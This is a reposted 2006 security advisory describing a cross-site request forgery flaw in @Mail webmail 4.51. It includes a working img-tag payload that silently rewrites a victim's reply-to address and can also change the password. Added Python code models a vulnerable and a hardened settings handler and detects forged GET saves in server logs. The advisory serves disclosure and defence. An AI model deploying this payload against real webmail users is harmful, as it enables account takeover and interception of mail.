Netragard Security Advisory 2006-12-18

Posted Jan 27, 2007
Authored by Netragard | Site netragard.com

Netragard, L.L.C Advisory - It is possible to take control of an @Mail webmail email account by exploiting a Cross Site Request Forgery (CSRF) vulnerability in the @Mail webmail product. An attacker can send a specially crafted email to any @Mail webmail user with a forged "img" tag. This forged tag, if crafted properly, will inject new settings into the @Mail webmail user's account. Version 4.51 is susceptible.

tags | advisory, csrf
MD5 | 629b483b68e10bb70a63d9f54125e278

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard, L.L.C Advisory ********************
ATMAIL-XRRF-ADVISORY-20061218


Strategic Reconnaissance Team

------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."



[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href="http://www.netragard.com/html/recent_research.html">Netragard Research</a>





[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
----------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061218
Product Name : @Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability : Cross Site Request Forgery
Effort : Easy

----------------------------------------------------------------------
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."

--http://www.atmail.com--





[Technical Summary]
----------------------------------------------------------------------
It is possible to take control of an @Mail webmail email account
by exploiting a Cross Site Request Forgery (CSRF) vulnerability in
the @Mail webmail product. An attacker can send a specially crafted
email to any @Mail webmail user with a forged "img" tag. This forged
tag, if crafted properly, will inject new settings into the @Mail
webmail user's account.

Example:
http://server/webmail/util.pl?func=settings&<forged settings in here>





[Technical Details]
----------------------------------------------------------------------
Netragard has discovered a critical flaw in @Mail webmail that allows
an attacker to change arbitrary settings in a user's @Mail webmail
account. This flaw targets the util.pl page that is used to manage a
user's account settings.

By default this page uses "HTTP POST" to commit changes. Netragard has
found that it is also possible to commit settings changes using an
"HTTP GET".

@Mail webmail's default configuration is to disable the display of
images from senders who are not in the current account's address book.
Senders contained in the address book are considered to be trusted.

@Mail webmail's image loading security feature can be circumvented
by using specially crafted "img" tags embedded in emails sent to
@Mail webmail users: when an external image is referenced by using
the "img" tag, @Mail webmail automatically retrieves the image and
loads it as part of the email, so the request is issued with the
victim's authenticated webmail session.

If the "img" tag's source is replaced by a specially crafted URL then
an attacker can commit changes to the targeted @Mail webmail email
account.
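The fix for the flaw described above is to refuse state-changing requests that arrive as GET and to bind every settings submission to a per-session anti-CSRF token. The following Python model is added here and is not @Mail's own code: it stands in for a util.pl-style settings handler in its vulnerable and hardened forms, and the parameter names, the Session class and the origin victim.example are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed model of a webmail settings endpoint; it is not @Mail's util.pl.
ALLOWED_ORIGIN = "https://victim.example"   # assumed site origin
MUTATING_FUNCS = {"settings"}               # func= values that change account state


@dataclass
class Session:
    user: str
    settings: dict = field(default_factory=dict)
    # Per-session anti-CSRF token, issued once and embedded in the settings form.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def _query(url):
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def handle_vulnerable(session, method, url):
    """Vulnerable pattern: func=settings&save=1 is applied whatever the HTTP
    method is, so the GET a browser issues for <img src=...> is enough."""
    q = _query(url)
    if q.get("func") in MUTATING_FUNCS and q.get("save") == "1":
        session.settings.update({k: v for k, v in q.items() if k not in ("func", "save")})
        return 200
    return 400


def handle_hardened(session, method, url, form=None, headers=None):
    """Hardened pattern: state changes only via POST, only with a form token
    that matches the session token (constant-time compare), and only from
    the site's own origin. An image fetch already fails the method check."""
    form, headers = form or {}, headers or {}
    if _query(url).get("func") not in MUTATING_FUNCS:
        return 400
    if method != "POST":
        return 405
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return 403
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != ALLOWED_ORIGIN and not origin.startswith(ALLOWED_ORIGIN + "/"):
        return 403
    session.settings.update({k: v for k, v in form.items() if k != "csrf_token"})
    return 200
```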





[Proof Of Concept]
----------------------------------------------------------------------
The example below changes the reply-to address of the victim to
attacker@haxor.org. Similar attacks can be used to change other user
settings, including the user's password.


<img src=http://victim.com/atmail/webmail/util.pl?func=settings&save=1&
RealName=&ReplyTo=attacker%40hax0r.org&MboxOrder=id&EmailHeaders=Standard&
FontStyle=Verdana&Language=english&LeaveMsgs=1&Refresh=1200&MsgNum=25&
TimeFormat=%25l%3A%25M+%25p&DateFormat=%25e%2F%25m%2F%25y&TimeZone=
America%2FNew_York&EmailEncoding=UTF8&DisplayImages=2&AutoComplete=
1&Advanced=1&HtmlEditor=1&Signature=&save=Save+Settings&AutoReply=&
PKIenable=1&PGPenable=0&SMIMEtown=&SMIMEstate=&SMIMEcountry=&PGPpassword=
&PGPpasswordconfirm=&LoginType=xul&PrimaryColor=%23EBE9E4&SecondaryColor=%
23F4F4F4&ThirdColor=%23FAFAFA&HeaderColor=%23F5F5F5&HeadColor=%2306082C&
BgColor=%23F9F9F9&TextColor=%2306082C&TextHeadColor=%23303030&LinkColor=%
23000000&VlinkColor=%23000033&OnColor=%23F3F3F3&OffColor=%23FFFFFF&
SelectColor=%23E4EEF8&TopBg=imgs%2Fgraygrad.g>
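Until a fix is deployed, the attack is visible in web server logs: the forged request is a GET to util.pl carrying func=settings and save=1, whereas a legitimate settings save is a POST. The following Python detector is added here and is not part of the original advisory; it runs over constructed Apache combined-format log lines, and the client addresses, hosts and referers in them are invented.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines; not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Dec/2006:10:01:02 -0500] "GET /atmail/webmail/util.pl?func=settings&save=1&ReplyTo=attacker%40example.test&DisplayImages=2 HTTP/1.1" 200 512 "http://victim.example/atmail/webmail/" "Mozilla/5.0"
10.0.0.5 - - [18/Dec/2006:10:01:05 -0500] "POST /atmail/webmail/util.pl?func=settings HTTP/1.1" 200 512 "http://victim.example/atmail/webmail/util.pl?func=settings" "Mozilla/5.0"
10.0.0.9 - - [18/Dec/2006:10:02:11 -0500] "GET /atmail/webmail/util.pl?func=settings HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$'
)
# Settings keys from the advisory's PoC whose change is worth reporting.
WATCH_KEYS = {"ReplyTo", "AutoReply", "DisplayImages", "Signature", "PGPpassword"}


def find_settings_csrf(log_text):
    """Return one finding per GET that commits settings changes (save=1)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; ignore
        client, ts, method, target, status, referer = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/util.pl"):
            continue
        q = parse_qs(parts.query)
        # A save committed over GET is the signature of the forged <img> fetch.
        if method != "GET" or q.get("func") != ["settings"] or q.get("save") != ["1"]:
            continue
        findings.append({
            "client": client,
            "time": ts,
            "status": status,          # 200 means the server accepted the change
            "referer": referer,
            "changed": sorted(k for k in q if k in WATCH_KEYS),
        })
    return findings
```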





[Vendor Status]
----------------------------------------------------------------------
Vendor Notified on 12/18/06





[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com">http://www.netragard.com</a>

ATMAIL-XRRF-ADVISORY-20061218
